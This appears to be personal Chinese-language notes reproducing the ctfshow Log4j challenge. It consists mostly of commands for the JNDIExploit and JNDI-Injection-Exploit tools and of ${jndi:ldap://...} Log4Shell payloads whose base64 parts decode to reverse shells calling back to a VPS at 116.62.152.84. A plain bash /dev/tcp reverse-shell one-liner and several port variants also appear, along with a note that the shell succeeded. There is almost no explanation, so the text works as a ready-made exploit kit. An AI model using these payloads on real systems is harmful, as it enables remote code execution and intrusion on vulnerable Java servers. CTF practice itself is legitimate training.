ctfshow-Log4j复现-log4j复现

1、买VPS，打开mobax进行ssh连接，开两个终端

一个终端开启监听

另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 116.62.152.84

生成payload

构造payload

${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx}

输入进去之后看结果

反弹shell成功

结束

bash -i >& /dev/tcp/116.62.152.84/2220>&1 

java -jarJNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzIyMzIgMD4mMQ==}|{base64,-d}|{bash,-i}"-A 116.62.152.84

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDI0IDA+JjE=


50024
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDI0IDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.84


YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDIwIDA+JjE=
50020
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDIwIDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.84


50019
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDE5IDA+JjE=

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMTUyLjg0LzUwMDE5IDA+JjE=}|{base64,-d}|{bash,-i}"-A 116.62.152.84



ldap://172.31.135.21:1389/dddxhj

c=${jndi:ldap://172.31.135.21:1389/dddxhj}


c=${jndi:ldap://172.31.135.21:1389/yqffbb}

c=${jndi:ldap://172.31.135.21:1389/f54nch}






payload

${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC80NCAwPiYx}

${jndi:ldap://116.62.152.84:1389/Basic/Command/Base64/c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx}

c2ggLWkgPiYgL2Rldi90Y3AvMTE2LjYyLjE1Mi44NC81MDAxNyAwPiYx